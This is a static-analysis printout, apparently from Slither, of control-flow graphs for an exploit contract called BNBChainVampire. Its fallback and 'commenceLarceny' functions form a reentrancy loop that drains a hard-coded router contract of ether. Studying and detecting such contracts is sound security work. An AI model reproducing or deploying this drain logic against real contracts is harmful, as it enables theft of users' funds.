Contract: ITargetRouter
==================================================


Contract: BNBChainVampire
==================================================

Function: fallback
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: address(targetRouter).balance >= 1000000000000000000

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: targetRouter.crosschainTransfer(address(address(this)),1000000000000000000)

  ID: 3
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  1 -> 3
  2 -> 3

Function: commenceLarceny
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool)(msg.value >= 1000000000000000000)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: ITargetRouter(targetRouter).crosschainTransfer(address(address(this)),msg.value)

Edges:
  0 -> 1
  1 -> 2

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: targetRouter = ITargetRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)

Edges:


